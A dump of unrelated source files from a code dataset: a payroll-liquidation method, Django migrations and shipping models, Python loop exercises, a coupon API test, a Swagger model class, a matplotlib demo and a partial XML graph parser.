def calcular_nomina(self, empleado):
auxilio_transporte_efectivo = self.calcular_auxilio_transporte(empleado.salario)
apropiaciones = self.calcular_apropiaciones(empleado.salario, auxilio_transporte_efectivo)
deducciones = self.calcular_deducciones(empleado.salario)
return NominaEmpleado(apropiaciones,deducciones, auxilio_transporte_efectivo)
def guardar_liquidacion_nomina(self, liquidaciones_empleados, nombre_archivo_liquidacion):
self.log_utils.guardar_log("Creando archivo " + nombre_archivo_liquidacion + " ...")
self.log_utils.crear_archivo(nombre_archivo_liquidacion)
# Ciclo 3 para guardar liquidacion en archivo liquidacion.txt.
self.log_utils.guardar_log("Guardando liquidacion...")
for liquidacion_empleado in liquidaciones_empleados:
contenido_linea = (
liquidacion_empleado.empleado.id, # Id empleado
liquidacion_empleado.empleado.nombre, # Nombre empleado
liquidacion_empleado.empleado.cargo, # Cargo empleado
int(liquidacion_empleado.empleado.salario), # Salario base
liquidacion_empleado.nomina_empleado.valor_auxilio_transporte, # Aporte auxilio de transporte efectivo.
liquidacion_empleado.nomina_empleado.apropiacion.prestacion_social.cesantias, # Aporte cesantias
liquidacion_empleado.nomina_empleado.apropiacion.prestacion_social.interes_cesantias, # Aporte intereses sobre cesantias
liquidacion_empleado.nomina_empleado.apropiacion.prestacion_social.prima_servicios, # Aporte prima
liquidacion_empleado.nomina_empleado.apropiacion.prestacion_social.vacaciones, # Aporte vacaciones
liquidacion_empleado.nomina_empleado.apropiacion.seguridad_social.arl, # Aporte arl
liquidacion_empleado.nomina_empleado.apropiacion.seguridad_social.salud_empresa, # Aporte salud empresa
liquidacion_empleado.nomina_empleado.apropiacion.seguridad_social.pension_empresa, # Aporte pension empresa
liquidacion_empleado.nomina_empleado.apropiacion.aporte_parafiscal.sena, # Aporte SENA
liquidacion_empleado.nomina_empleado.apropiacion.aporte_parafiscal.icbf, # Aporte ICBF
liquidacion_empleado.nomina_empleado.apropiacion.aporte_parafiscal.cajas, # Aporte Cajas de Compensacion
liquidacion_empleado.nomina_empleado.deduccion.salud_empleado, # Aporte salud empleado
liquidacion_empleado.nomina_empleado.deduccion.pension_empleado, # Aporte pension empleado
liquidacion_empleado.nomina_empleado.deduccion.aporte_fondo_solidaridad, # Aporte fondo de solidaridad
liquidacion_empleado.salario_neto, # Salario neto para el empleado
liquidacion_empleado.costo_empresa # Costo total para la empresa
)
formato_linea = "Id: %d " \
"Nombre: %s " \
"Cargo: %s " \
"Salario base: %.2f " \
"Auxilio de Transporte: %.2f " \
"Apropiaciones -> " \
"Prestaciones Sociales - " \
"Cesantias: %.2f " \
"Intereses sobre cesantias: %.2f " \
"Prima: %.2f " \
"Vacaciones: %.2f " \
"Seguridad Social - " \
"ARL: %.2f " \
"Salud empresa: %.2f " \
"Pension empresa: %.2f " \
"Parafiscales - " \
"SENA: %.2f " \
"ICBF: %.2f " \
"Cajas: %.2f " \
"Deducciones -> " \
"Salud empleado: %.2f " \
"Pension empleado: %.2f " \
"Fondo de solidaridad: %.2f " \
"-- Salario neto empleado --> : %.2f " \
"-- Costo total empresa --> : %.2f " \
"\n"
self.log_utils.escribir_linea_archivo(nombre_archivo_liquidacion, formato_linea % contenido_linea)
self.log_utils.guardar_log("Liquidacion guardada...") | [
"tdp201503@gmail.com"
] | tdp201503@gmail.com |
cb4d004c16b1c2d9d572c6366e253777db1067fb | 7a0d58b578c8346f45cecbac2fb26d44c20b499f | /BrubotServer/Interface/migrations/0003_auto_20181004_1127.py | 83a37ef26beab722e543a46311080b081964c9d3 | [] | no_license | bro-wer/brubot_server | e8d843cb27aa8b12d780038ccdd643721e7e5b19 | d203145836cc87568cc1b4ba6b6cdc04cc653229 | refs/heads/master | 2020-03-30T20:07:30.600144 | 2018-10-08T10:56:18 | 2018-10-08T10:56:18 | 151,574,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 556 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-10-04 09:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Interface', '0002_task_status'),
]
operations = [
migrations.AlterField(
model_name='task',
name='status',
field=models.CharField(choices=[('NS', 'Not Started'), ('ST', 'Started'), ('FI', 'Finished'), ('ER', 'Error')], default='Not Started', max_length=5),
),
]
| [
"bronislaw.werla@gft.com"
] | bronislaw.werla@gft.com |
c27aad2901a9f0422a24a7ad7838f5d4c3a0c1e5 | 24180ecc26262c952cdf9da0ba062bfb1d3f5126 | /04/02.for.py | 9338b08c8ff50897a40e6368e60ccf8b89b95123 | [] | no_license | whwndgus001/python-basics | d3d380268994c1ec2de93c1734db480116331485 | b92e167261c876e762127bc60bd40071257c1d0f | refs/heads/master | 2022-12-26T03:04:16.218402 | 2020-10-05T06:48:11 | 2020-10-05T06:48:11 | 290,401,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,426 | py | # for 반복문
# for in [sequnce 객체] :
for number in [10, 20, 30, 40] :
result = number**2
print (result, '----', end=' ')
else:
print('')
a = ['cat', 'cow', 'tiger']
for animal in a:
print(animal, end=' ')
else:
print('')
# 복합 자료형을 for문에서 사용하는 경우
l = [('둘리', 10), ('마이콜', 30),('또치', 11)]
for t in l:
print('이름: %s, 나이:%d' %t)
# 10번 반복하는 Loop
for i in range(1, 11):
print(i, end=' ')
else:
print('\n---------------------')
# 1 ~ 10 합을 구하기
sum = 0
for i in range(1, 11):
sum=sum+i
print(sum)
# break
for n in range(10):
if n > 5 :
break
print(n, end=' ')
else:
print('\n-------------')
print("\n-------------------")
# continue
for n in range(10):
if n <= 5 :
continue
print(n, end=' ')
else:
print('\n-------구구단 1-----')
for i in range(1, 10):
for j in range (1, 10):
print("%d x %d = %d" % (i, j, i*j))
print("\n-----------구구단 2----------")
#구구단
for i in range(1, 10):
for j in range(1, 10):
print("{0} x {1} = {2}" .format (j, i, j * i), end='\t')
else:
print('')
print('\n-----------삼각형-----------')
for i in range(10):
for j in range(0 ,i+1):
print('*', end='')
else:
print('')
print('\n--------삼각형2-------------')
for i in range(10, 0, -1):
print('*' * i) | [
"whwndgus0000@naver.com"
] | whwndgus0000@naver.com |
a52dfaac37bcd5fa128652b84d5b4b9904f40414 | 1974b3e9c5f2f677833e1608a41281f377fd331c | /dltesthttp_xuyalin2/www/testcase/dlmall/ts_couponx/getUseFulCoupons.py | e7f7c5c587deb28ea48f702a15f9161b6113a024 | [] | no_license | xyl00755/pythonLearning | ed0f540b61247c3560f347853da5886b2e2ba25d | c6aecff86ff34dcd7358d98201627ff84e9bf2cf | refs/heads/master | 2021-01-13T08:19:25.171016 | 2016-12-16T05:43:10 | 2016-12-16T05:43:10 | 71,764,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,696 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
from www.api.dlmall import *
from www.common.excel import *
from www.common.database import *
"""
/couponx/getUseFulCoupons.html
request:
get
http://123.57.244.205:9003/couponx/getUseFulCoupons.html?goodsId=f4bccbbd84e44f9ba839e082970dccca%2C9c02bcf9737d499a8a72a3514730b425%2C24df3ab5b628496aa0fdded6c4230fec%2C2e78061ea75b26638ef38d1b0c848cbb%2Cbc54482ad9a44f3d95b63d9876bc3100%2C&t=1474440394741
response:json string
{
"status": 0,
"data": {
"unUseFulCoupons": [
{
"id": null,
"couponEntityId": "114512879800028",
"couponName": "6元优惠券验证",
"couponAmt": 600,
"couponEntityStatus": "01",
"effectiveTime": "2016-09-21",
"uneffectiveTime": "2016-10-21",
"category": "白酒",
"expireTime": null,
"useTime": null,
"records": null
}
],
"useFulCoupons": [
{
"id": null,
"couponEntityId": "114512879800028",
"couponName": "6元优惠券验证",
"couponAmt": 600,
"couponEntityStatus": "01",
"effectiveTime": "2016-09-21",
"uneffectiveTime": "2016-10-21",
"category": "白酒",
"expireTime": null,
"useTime": null,
"records": null
}
]
},
"msg": ""
}
"""
class getUseFulCoupons(unittest.TestCase):
UserShop = eData('WebManager')
danluCouponsInfo=eData('DanluCoupons')
dlservice = dlmall()
s = dlservice.login(UserShop.buyer_username,UserShop.buyer_password)
#四种红包1 过期时间最长 2 两个过期时间一样但是一个金额大一个金额小 3 过期时间最短 检查返回值排序
def test_Coupons_sort(self):
data =[self.danluConponsInfo.goodsId1,self.danluConponsInfo.goodsId2,self.danluConponsInfo.goodsId3,self.danluConponsInfo.goodsId4]
a =','
a.join(data)
couponlist= self.dlservice.getUseFulCoupons(s,data)
self.assertEqual(couponlist['data']['UseFulCoupons'][0]['couponEntityId'],self.danluCouponsInfo.couponEntityId4)
self.assertEqual(couponlist['data']['UseFulCoupons'][1]['couponEntityId'],self.danluCouponsInfo.couponEntityId3)
self.assertEqual(couponlist['data']['UseFulCoupons'][2]['couponEntityId'],self.danluCouponsInfo.couponEntityId2)
self.assertEqual(couponlist['data']['UseFulCoupons'][3]['couponEntityId'],self.danluCouponsInfo.couponEntityId1)
| [
"xuyalin@danlu.com"
] | xuyalin@danlu.com |
54a7a9643b787b5bc24f6ee402a26926bdf4aa36 | d34db2a5d96cd155f9e6fef1db0ac697c28ee527 | /ToDo_App/my_app/todo_list/migrations/0001_initial.py | 4431d1886c465192e8aec5f39177ef42fd74f2a5 | [] | no_license | sinyinglee/Pyclass-2019- | 5e69d56009543353db0f9deb576a17e1f4ca23df | c48c42f68512da6457c2453fd2ce0e15a063bf83 | refs/heads/master | 2020-08-04T19:00:08.331930 | 2020-04-28T15:54:03 | 2020-04-28T15:54:03 | 212,241,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | # Generated by Django 3.0.1 on 2019-12-22 05:20
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='List',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item', models.CharField(max_length=200)),
('completed', models.BooleanField(default=False)),
],
),
]
| [
"mandylee@Mandyde-MacBook-Pro.local"
] | mandylee@Mandyde-MacBook-Pro.local |
d9147f28893fa78f78452ad48057faef6031d89a | fe21de00c15c174a2052cd601399ccb25a8e89dd | /digitick_client/models/shows_response_inner.py | d4f574e1311d165723db3269a3ea8105408e5195 | [
"MIT"
] | permissive | frague59/digitick-client | 560f775c7731ed7eda1f20137a7c2f8f67c7761d | b8787438cddc60720c60c8b23826185a7d0988d5 | refs/heads/master | 2021-09-05T01:49:18.131356 | 2018-01-23T15:23:27 | 2018-01-23T15:23:27 | 114,750,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,509 | py | # coding: utf-8
"""
Digitick REST API
The Digitick REST API is a set of methods giving access to catalog, user and cart management.
OpenAPI spec version: v1.0
Contact: contact@digitick.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class ShowsResponseInner(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'int',
'start': 'str',
'end': 'str',
'venue': 'str',
'address': 'str',
'zip_code': 'str',
'city': 'str',
'country_id': 'int',
'number_of_prices': 'int',
'min_price_cents': 'int',
'max_price_cents': 'int',
'reserved_seats': 'bool',
'plan_url': 'str',
'plan_last_change': 'str',
'status': 'int',
'sales_start': 'str',
'sales_end': 'str',
'is_exclu': 'bool'
}
attribute_map = {
'id': 'id',
'start': 'start',
'end': 'end',
'venue': 'venue',
'address': 'address',
'zip_code': 'zipCode',
'city': 'city',
'country_id': 'countryId',
'number_of_prices': 'numberOfPrices',
'min_price_cents': 'minPriceCents',
'max_price_cents': 'maxPriceCents',
'reserved_seats': 'reservedSeats',
'plan_url': 'planUrl',
'plan_last_change': 'planLastChange',
'status': 'status',
'sales_start': 'salesStart',
'sales_end': 'salesEnd',
'is_exclu': 'isExclu'
}
def __init__(self, id=None, start=None, end=None, venue=None, address=None, zip_code=None, city=None, country_id=None, number_of_prices=None, min_price_cents=None, max_price_cents=None, reserved_seats=None, plan_url=None, plan_last_change=None, status=None, sales_start=None, sales_end=None, is_exclu=None):
"""
ShowsResponseInner - a model defined in Swagger
"""
self._id = None
self._start = None
self._end = None
self._venue = None
self._address = None
self._zip_code = None
self._city = None
self._country_id = None
self._number_of_prices = None
self._min_price_cents = None
self._max_price_cents = None
self._reserved_seats = None
self._plan_url = None
self._plan_last_change = None
self._status = None
self._sales_start = None
self._sales_end = None
self._is_exclu = None
if id is not None:
self.id = id
if start is not None:
self.start = start
if end is not None:
self.end = end
if venue is not None:
self.venue = venue
if address is not None:
self.address = address
if zip_code is not None:
self.zip_code = zip_code
if city is not None:
self.city = city
if country_id is not None:
self.country_id = country_id
if number_of_prices is not None:
self.number_of_prices = number_of_prices
if min_price_cents is not None:
self.min_price_cents = min_price_cents
if max_price_cents is not None:
self.max_price_cents = max_price_cents
if reserved_seats is not None:
self.reserved_seats = reserved_seats
if plan_url is not None:
self.plan_url = plan_url
if plan_last_change is not None:
self.plan_last_change = plan_last_change
if status is not None:
self.status = status
if sales_start is not None:
self.sales_start = sales_start
if sales_end is not None:
self.sales_end = sales_end
if is_exclu is not None:
self.is_exclu = is_exclu
@property
def id(self):
"""
Gets the id of this ShowsResponseInner.
:return: The id of this ShowsResponseInner.
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this ShowsResponseInner.
:param id: The id of this ShowsResponseInner.
:type: int
"""
self._id = id
@property
def start(self):
"""
Gets the start of this ShowsResponseInner.
:return: The start of this ShowsResponseInner.
:rtype: str
"""
return self._start
@start.setter
def start(self, start):
"""
Sets the start of this ShowsResponseInner.
:param start: The start of this ShowsResponseInner.
:type: str
"""
self._start = start
@property
def end(self):
"""
Gets the end of this ShowsResponseInner.
:return: The end of this ShowsResponseInner.
:rtype: str
"""
return self._end
@end.setter
def end(self, end):
"""
Sets the end of this ShowsResponseInner.
:param end: The end of this ShowsResponseInner.
:type: str
"""
self._end = end
@property
def venue(self):
"""
Gets the venue of this ShowsResponseInner.
:return: The venue of this ShowsResponseInner.
:rtype: str
"""
return self._venue
@venue.setter
def venue(self, venue):
"""
Sets the venue of this ShowsResponseInner.
:param venue: The venue of this ShowsResponseInner.
:type: str
"""
self._venue = venue
@property
def address(self):
"""
Gets the address of this ShowsResponseInner.
:return: The address of this ShowsResponseInner.
:rtype: str
"""
return self._address
@address.setter
def address(self, address):
"""
Sets the address of this ShowsResponseInner.
:param address: The address of this ShowsResponseInner.
:type: str
"""
self._address = address
@property
def zip_code(self):
"""
Gets the zip_code of this ShowsResponseInner.
:return: The zip_code of this ShowsResponseInner.
:rtype: str
"""
return self._zip_code
@zip_code.setter
def zip_code(self, zip_code):
"""
Sets the zip_code of this ShowsResponseInner.
:param zip_code: The zip_code of this ShowsResponseInner.
:type: str
"""
self._zip_code = zip_code
@property
def city(self):
"""
Gets the city of this ShowsResponseInner.
:return: The city of this ShowsResponseInner.
:rtype: str
"""
return self._city
@city.setter
def city(self, city):
"""
Sets the city of this ShowsResponseInner.
:param city: The city of this ShowsResponseInner.
:type: str
"""
self._city = city
@property
def country_id(self):
"""
Gets the country_id of this ShowsResponseInner.
:return: The country_id of this ShowsResponseInner.
:rtype: int
"""
return self._country_id
@country_id.setter
def country_id(self, country_id):
"""
Sets the country_id of this ShowsResponseInner.
:param country_id: The country_id of this ShowsResponseInner.
:type: int
"""
self._country_id = country_id
@property
def number_of_prices(self):
"""
Gets the number_of_prices of this ShowsResponseInner.
:return: The number_of_prices of this ShowsResponseInner.
:rtype: int
"""
return self._number_of_prices
@number_of_prices.setter
def number_of_prices(self, number_of_prices):
"""
Sets the number_of_prices of this ShowsResponseInner.
:param number_of_prices: The number_of_prices of this ShowsResponseInner.
:type: int
"""
self._number_of_prices = number_of_prices
@property
def min_price_cents(self):
"""
Gets the min_price_cents of this ShowsResponseInner.
:return: The min_price_cents of this ShowsResponseInner.
:rtype: int
"""
return self._min_price_cents
@min_price_cents.setter
def min_price_cents(self, min_price_cents):
"""
Sets the min_price_cents of this ShowsResponseInner.
:param min_price_cents: The min_price_cents of this ShowsResponseInner.
:type: int
"""
self._min_price_cents = min_price_cents
@property
def max_price_cents(self):
"""
Gets the max_price_cents of this ShowsResponseInner.
:return: The max_price_cents of this ShowsResponseInner.
:rtype: int
"""
return self._max_price_cents
@max_price_cents.setter
def max_price_cents(self, max_price_cents):
"""
Sets the max_price_cents of this ShowsResponseInner.
:param max_price_cents: The max_price_cents of this ShowsResponseInner.
:type: int
"""
self._max_price_cents = max_price_cents
@property
def reserved_seats(self):
"""
Gets the reserved_seats of this ShowsResponseInner.
:return: The reserved_seats of this ShowsResponseInner.
:rtype: bool
"""
return self._reserved_seats
@reserved_seats.setter
def reserved_seats(self, reserved_seats):
"""
Sets the reserved_seats of this ShowsResponseInner.
:param reserved_seats: The reserved_seats of this ShowsResponseInner.
:type: bool
"""
self._reserved_seats = reserved_seats
@property
def plan_url(self):
"""
Gets the plan_url of this ShowsResponseInner.
:return: The plan_url of this ShowsResponseInner.
:rtype: str
"""
return self._plan_url
@plan_url.setter
def plan_url(self, plan_url):
"""
Sets the plan_url of this ShowsResponseInner.
:param plan_url: The plan_url of this ShowsResponseInner.
:type: str
"""
self._plan_url = plan_url
@property
def plan_last_change(self):
"""
Gets the plan_last_change of this ShowsResponseInner.
:return: The plan_last_change of this ShowsResponseInner.
:rtype: str
"""
return self._plan_last_change
@plan_last_change.setter
def plan_last_change(self, plan_last_change):
"""
Sets the plan_last_change of this ShowsResponseInner.
:param plan_last_change: The plan_last_change of this ShowsResponseInner.
:type: str
"""
self._plan_last_change = plan_last_change
@property
def status(self):
"""
Gets the status of this ShowsResponseInner.
:return: The status of this ShowsResponseInner.
:rtype: int
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this ShowsResponseInner.
:param status: The status of this ShowsResponseInner.
:type: int
"""
self._status = status
@property
def sales_start(self):
"""
Gets the sales_start of this ShowsResponseInner.
:return: The sales_start of this ShowsResponseInner.
:rtype: str
"""
return self._sales_start
@sales_start.setter
def sales_start(self, sales_start):
"""
Sets the sales_start of this ShowsResponseInner.
:param sales_start: The sales_start of this ShowsResponseInner.
:type: str
"""
self._sales_start = sales_start
@property
def sales_end(self):
"""
Gets the sales_end of this ShowsResponseInner.
:return: The sales_end of this ShowsResponseInner.
:rtype: str
"""
return self._sales_end
@sales_end.setter
def sales_end(self, sales_end):
"""
Sets the sales_end of this ShowsResponseInner.
:param sales_end: The sales_end of this ShowsResponseInner.
:type: str
"""
self._sales_end = sales_end
@property
def is_exclu(self):
"""
Gets the is_exclu of this ShowsResponseInner.
:return: The is_exclu of this ShowsResponseInner.
:rtype: bool
"""
return self._is_exclu
@is_exclu.setter
def is_exclu(self, is_exclu):
"""
Sets the is_exclu of this ShowsResponseInner.
:param is_exclu: The is_exclu of this ShowsResponseInner.
:type: bool
"""
self._is_exclu = is_exclu
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, ShowsResponseInner):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"fguerin@ville-tourcoing.fr"
] | fguerin@ville-tourcoing.fr |
b9bcf064e318743a5c5030ddf2e243fa9c742794 | 8537ecfe2a23cfee7c9f86e2318501f745078d67 | /Practise_stuff/matplotlib/click_on_point_to_see_timeseries.py | d68c313bc04fa4ac8a3c2008391627668a605bd3 | [] | no_license | oolsson/oo_eclipse | 91d33501d9ed6c6b3c51bb22b635eb75da88e4e1 | 1828866bc4e1f67b279c5a037e4a6a4439ddb090 | refs/heads/master | 2021-01-01T20:17:12.644890 | 2015-11-30T09:49:41 | 2015-11-30T09:49:41 | 23,485,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,316 | py | import numpy as np
class PointBrowser:
"""
Click on a point to select and highlight it -- the data that
generated the point will be shown in the lower axes. Use the 'n'
and 'p' keys to browse through the next and previous points
"""
def __init__(self):
self.lastind = 0
self.text = ax.text(0.05, 0.95, 'selected: none',
transform=ax.transAxes, va='top')
self.selected, = ax.plot([xs[0]], [ys[0]], 'o', ms=12, alpha=0.4,
color='yellow', visible=False)
def onpress(self, event):
if self.lastind is None: return
if event.key not in ('n', 'p'): return
if event.key=='n': inc = 1
else: inc = -1
self.lastind += inc
self.lastind = np.clip(self.lastind, 0, len(xs)-1)
self.update()
def onpick(self, event):
if event.artist!=line: return True
N = len(event.ind)
if not N: return True
# the click locations
x = event.mouseevent.xdata
y = event.mouseevent.ydata
distances = np.hypot(x-xs[event.ind], y-ys[event.ind])
indmin = distances.argmin()
dataind = event.ind[indmin]
self.lastind = dataind
self.update()
def update(self):
if self.lastind is None: return
dataind = self.lastind
ax2.cla()
ax2.plot(X[dataind])
ax2.text(0.05, 0.9, 'mu=%1.3f\nsigma=%1.3f'%(xs[dataind], ys[dataind]),
transform=ax2.transAxes, va='top')
ax2.set_ylim(-0.5, 1.5)
self.selected.set_visible(True)
self.selected.set_data(xs[dataind], ys[dataind])
self.text.set_text('selected: %d'%dataind)
fig.canvas.draw()
if __name__ == '__main__':
import matplotlib.pyplot as plt
X = np.random.rand(100, 200)
xs = np.mean(X, axis=1)
ys = np.std(X, axis=1)
fig, (ax, ax2) = plt.subplots(2, 1)
ax.set_title('click on point to plot time series')
line, = ax.plot(xs, ys, 'o', picker=5) # 5 points tolerance
browser = PointBrowser()
fig.canvas.mpl_connect('pick_event', browser.onpick)
fig.canvas.mpl_connect('key_press_event', browser.onpress)
plt.show()
| [
"o.h.olsson@gmail.com"
] | o.h.olsson@gmail.com |
92e7687c7a8ef96851e81777f69514357f9cb034 | 020b0d5029a2095118356290046c71206bb24721 | /shipping/models.py | 64b05cad347435fa4bfebff6a138d095e02da066 | [] | no_license | H1tman1978/DjangoShippingApp | 5e59f0882f4a3af63456bee23a933335a926559d | 530db4a4d2e9f92c41795b3e989301a742c49a99 | refs/heads/master | 2023-01-23T18:49:11.231553 | 2020-11-13T21:51:00 | 2020-11-13T21:51:00 | 311,332,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,000 | py | from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
# Create your models here.
class Address(models.Model):
STATE_PROVINCE_CHOICES = [
# US States
('AL', 'Alabama - AL'),
('AK', 'Alaska - AK'),
('AZ', 'Arizona - AZ'),
('AR', 'Arkansas - AR'),
('CA', 'California - CA'),
('CO', 'Colorado - CO'),
('CT', 'Connecticut - CT'),
('DE', 'Delaware - DE'),
('FL', 'Florida - FL'),
('GA', 'Georgia - GA'),
('HI', 'Hawaii - HI'),
('ID', 'Idaho - ID'),
('IL', 'Illinois - IL'),
('IN', 'Indiana - IN'),
('IA', 'Iowa - IA'),
('KS', 'Kansas - KS'),
('KY', 'Kentucky - KY'),
('LA', 'Louisiana - LA'),
('ME', 'Maine - ME'),
('MD', 'Maryland - MD'),
('MA', 'Massachusetts - MA'),
('MI', 'Michigan - MI'),
('MN', 'Minnesota - MN'),
('MS', 'Mississippi - MS'),
('MO', 'Missouri - MO'),
('MT', 'Montana - MT'),
('NE', 'Nebraska - NE'),
('NV', 'Nevada - NV'),
('NH', 'New Hampshire - NH'),
('NJ', 'New Jersey - NJ'),
('NM', 'New Mexico - NM'),
('NY', 'New York - NY'),
('NC', 'North Carolina - NC'),
('ND', 'North Dakota - ND'),
('OH', 'Ohio - OH'),
('OK', 'Oklahoma - OK'),
('OR', 'Oregon - OR'),
('PA', 'Pennsylvania - PA'),
('RI', 'Rhode Island - RI'),
('SC', 'South Carolina - SC'),
('SD', 'South Dakota - SD'),
('TN', 'Tennessee - TN'),
('TX', 'Texas - TX'),
('UT', 'Utah - UT'),
('VT', 'Vermont - VT'),
('VA', 'Virginia - VA'),
('WA', 'Washington - WA'),
('WV', 'West Virginia - WV'),
('WI', 'Wisconsin - WI'),
('WY', 'Wyoming - WY'),
# US Commonwealth and Territories
('AS', 'American Samoa - AS'),
('DC', 'District of Columbia - DC'),
('FM', 'Federated States of Micronesia - FM'),
('GU', 'Guam - GU'),
('MH', 'Marshall Islands = MH'),
('MP', 'Northern Mariana Islands - MP'),
('PW', 'Palau - PW'),
('PR', 'Puerto Rico - PR'),
('VI', 'US Virgin Islands - VI'),
# Canadian Provinces and Territories
('AB', 'Alberta - AB'),
('BC', 'British Columbia - BC'),
('MB', 'Manitoba - MB'),
('NB', 'New Brunswick - NB'),
('NL', 'Newfoundland - NL'),
('NS', 'Nova Scotia - NS'),
('NT', 'Northwest Territories - NT'),
('NU', 'Nunavut - NU'),
('ON', 'Ontario - ON'),
('PE', 'Prince Edward Island - PE'),
('QC', 'Quebec - QC'),
('SK', 'Saskatchewan - SK'),
('YT', 'Yukon - YT'),
]
attention_to = models.CharField(max_length=50, blank=True, null=True)
company_name = models.CharField(max_length=50, blank=True, null=True)
address1 = models.CharField(max_length=50, blank=False)
address2 = models.CharField(max_length=50, blank=True, null=True)
city = models.CharField(max_length=25, blank=False, default="Austin")
state = models.CharField(max_length=2, choices=STATE_PROVINCE_CHOICES, default="TX", blank=False)
postal_code = models.CharField(max_length=10, default="78758", blank=True, null=True)
saved_name = models.CharField(max_length=30, blank=True, null=True)
created_by = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True)
def __str__(self):
return f"{self.saved_name}"
class Shipment(models.Model):
originating_address = models.ForeignKey(Address, on_delete=models.CASCADE, related_name='originating_addresses')
ship_to_address = models.ForeignKey(Address, on_delete=models.CASCADE, related_name='ship_to_addresses')
has_chemicals = models.BooleanField(default=False)
has_batteries = models.BooleanField(default=False)
is_magnetized = models.BooleanField(default=False)
instruction_number = models.CharField(max_length=15, unique=True, blank=False) # Refers to Shipment Instruction Number
has_shipped = models.BooleanField(default=False)
def __str__(self):
return f"{self.instruction_number}"
class Package(models.Model):
UNIT_TYPES = [
('BO', 'Box'),
('CS', 'Case'),
('CR', 'Crate'),
('DR', 'Drum'),
('PL', 'Pallet'),
]
case_number = models.CharField(max_length=10, unique=True)
type = models.CharField(max_length=2, choices=UNIT_TYPES, default='BO')
length = models.IntegerField(blank=False, default=12)
width = models.IntegerField(blank=False, default=12)
height = models.IntegerField(blank=False, default=12)
weight = models.IntegerField(blank=False, default=10)
tracking_number = models.CharField(max_length=25, unique=True)
carrier = models.CharField(max_length=50, default='UPS')
shipment_id = models.ForeignKey(Shipment, on_delete=models.CASCADE)
date_shipped = models.DateTimeField(default=timezone.now, blank=True, null=True)
def __str__(self):
return f"{self.case_number}"
class Part(models.Model):
"""Model for Parts"""
part_number = models.CharField(max_length=15, blank=False)
quantity = models.IntegerField(blank=False)
description = models.CharField(max_length=50, blank=False)
package_id = models.ForeignKey(Package, on_delete=models.CASCADE)
def __str__(self):
return f"{self.quantity} x {self.part_number} - {self.description}"
class Machine(models.Model):
machine_type = models.CharField(max_length=5, blank=True, null=True)
model = models.CharField(max_length=15, blank=False)
serial_number = models.CharField(max_length=50, blank=False)
description = models.CharField(max_length=50, blank=False)
package_id = models.ForeignKey(Package, on_delete=models.CASCADE)
def __str__(self):
return f"{self.machine_type}-{self.model}: {self.serial_number}"
| [
"anthonyrolfe1@outlook.com"
] | anthonyrolfe1@outlook.com |
25776af1187fca771865fe9e88c12c22d85a6df2 | d0e4eb61112f7ea62ed0d982dcd5937d5439c67c | /posts-network-graphtool.py | c70e075ad9ec61ec71aa7d77520f9a05cb56630e | [] | no_license | issaCucumber/network_graphs | 4d8ec5c6b9f37bc30956f8d4ca85f2c5b88ba7bb | 715e2b556ade5410576c972a0b0df5a3a7e58662 | refs/heads/master | 2020-04-06T06:59:38.282990 | 2016-09-11T08:37:37 | 2016-09-11T08:37:37 | 64,069,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,805 | py | #!/usr/bin/python
import xml.sax
import unicodedata
import os
import size
import color
import re
from graph_tool.all import *
from numpy import integer
vertices = {}
g = Graph(directed=False)
v_color = g.new_vertex_property("int")
v_size = g.new_vertex_property("int")
v_pen_width = g.new_vertex_property("int")
regex = re.compile(r"[0-9]+k*")
#Post Handler
class PostHandler( xml.sax.ContentHandler ):
def __init__(self):
self.dataStruct = []
self.commentLevel = 0
self.currentData = ""
self.currentPostVertexId = 0
def startElement(self, name, attrs):
global vertices
self.currentData = name
if name == "post":
replyto = unicodedata.normalize('NFKD', attrs.getValue("replyto")).encode('ascii','ignore')
id = unicodedata.normalize('NFKD', attrs.getValue("id")).encode('ascii','ignore')
#generate vertex of the current post id
if vertices.has_key(id) == False:
vertices[id] = g.add_vertex()
self.currentPostVertexId = vertices[id]
if vertices.has_key(replyto) == False:
vertices[replyto] = g.add_vertex()
self.currentPostVertexId = vertices[replyto]
if replyto == "null":
g.add_edge(vertices["human_rights"], vertices[id])
v_color[vertices[id]] = color.LEVEL_1
v_size[vertices[id]] = size.ROOT - 10
else:
g.add_edge(vertices[replyto], vertices[id])
v_color[vertices[id]] = color.LEVEL_1 + self.commentLevel
v_size[vertices[id]] = size.ROOT - 10 * (1 + self.commentLevel)
if name == "comments":
self.commentLevel += 1
def endElement(self, name):
